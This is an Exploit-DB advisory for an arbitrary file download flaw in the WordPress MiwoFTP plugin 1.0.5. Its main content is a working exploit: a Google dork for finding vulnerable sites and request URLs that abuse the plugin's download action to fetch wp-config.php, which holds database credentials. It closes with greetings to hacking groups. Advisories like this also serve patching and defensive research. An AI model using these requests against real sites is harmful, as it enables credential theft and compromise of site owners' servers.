WordPress Plugin MiwoFTP 1.0.5 - Arbitrary File Download (2)

EDB-ID:

36801

CVE:


Author:

dadou dz

Type:

webapps

Platform:

PHP

Published:

2015-04-21

######################

# Exploit Title : WordPress MiwoFTP Plugin 1.0.5 <= Arbitrary File Download

# Exploit Author : Dadou Dz

# Software Link : Premium

# Dork Google: inurl:com_miwoftp

# Affected version: 1.0.5

# Vendor Homepage:
http://miwisoft.com/wordpress-plugins/miwoftp-wordpress-file-manager#changelog


# Date : 2015-04-20

# Tested on : Windows 7 / Mozilla Firefox
#             Linux / Mozilla Firefox
######################

# Exploit:
http://TARGET/wp-admin/admin.php?page=miwoftp&option=com_miwoftp&action=download&item=[....somefile....]&order=name&srt=yes
"download_file" : wp-config.php
http://TARGET/wp-admin/admin.php?page=miwoftp&option=com_miwoftp&action=download&item=wp-config.php&order=name&srt=yes



#####################

Discovered By : Dadou Dz
           My Email - dadoudzdz@gmail.com
           fb: fb.com/Dz2Team
         [ Thanks To ]
Toxic Dz ~ faroukovic DZ _ PaWL _ bl4ck-dz _ Abdellah Elmaghribi

Algerian To The Core - Dz Team - 1337day Community Algeria - Fallaga Team

 AnonGhost Team -  Anonymous Dz - Backup Sec Dz

 Sec4ever.com - Gaza-Hacker.net - Dev-Tun.tn - Fallaga.tn - Aljyyosh.com -
dz-root.com

 And All My Freinds - All Muslims Hackers - All Algerian Hackers

#####################